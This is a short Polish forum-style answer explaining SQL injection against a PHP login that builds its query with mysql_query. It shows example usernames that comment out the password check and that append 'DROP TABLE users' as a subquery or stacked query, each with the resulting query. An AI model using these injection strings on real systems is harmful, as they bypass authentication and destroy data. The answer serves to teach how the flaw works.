Coś takiego powinno wystarczyć:
- Aby zalogować się jako użytkownik „foo”, ustaw nazwę użytkownika na „foo” -- ”
Spowoduje to, że Twoje zapytanie będzie wyglądać tak
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
Znak „--” oznacza, że reszta wiersza jest wykomentowana
- Nie jestem pewien, czy to zadziała, ale spróbuj ustawić nazwę użytkownika na „foo” OR (użytkownicy DROP TABLE) -- ”
Spowoduje to, że Twoje zapytanie będzie wyglądać tak:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
może tego nie zaakceptować - myślę, że podzapytania mogą tylko WYBRAĆ.
Funkcja mysql_query uruchomi tylko jedno zapytanie - inne pozwolą Ci to zrobić:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");